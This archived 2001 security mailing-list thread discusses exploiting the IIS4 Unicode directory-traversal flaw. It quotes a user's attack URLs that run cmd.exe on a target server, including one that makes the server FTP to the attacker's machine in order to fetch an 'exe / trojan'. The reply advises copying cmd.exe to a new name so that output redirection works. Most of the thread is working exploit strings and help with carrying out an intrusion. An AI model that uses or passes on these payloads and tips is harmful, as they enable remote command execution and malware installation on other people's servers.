Vulnerability Development mailing list archives
Re: unicode / iis4 (fwd)
From: Julian Linton <jlinton () CIS FAMU EDU>
Date: Sat, 6 Jan 2001 19:16:42 -0500
you must first to another copy cmd.exe to another name such as cmd1.exe, if you use cmd.exe it will not allow piping but simply rename it and u got a winner. http://www.securityfocus.com/templates/archive.pike?threads=0&end=2000-10-29 &mid=141284&start=2000-10-23&list=1&fromthread=0& give you an example ----- Original Message ----- From: "Mad Zigy" <zigy () GLOBAL CO ZA To: <VULN-DEV () SECURITYFOCUS COM> Sent: Saturday, January 06, 2001 7:59 AM Subject: unicode / iis4
Well i have been able to use msadc2.pl yet the commands i give do not work. so i tried the other way by doing http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test .txt and all it did was say: The parameter is incorrect. so then i though maybe we cant have a > in the string so i found the hex of it and tried http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+echo+test+% 3e+c:\test.txt yet it still gave me the same: The parameter is incorrect. I have been able to make it ftp into my pc by http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+ftp+hostname but i cant make it login as i need to echo a script which i can run http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+ftp+- s:c:\ftp.txt+hostname so that it will login and download the exe / trojan Thankz zigy!
Current thread:
- Re: unicode / iis4 (fwd) Julian Linton (Jan 07)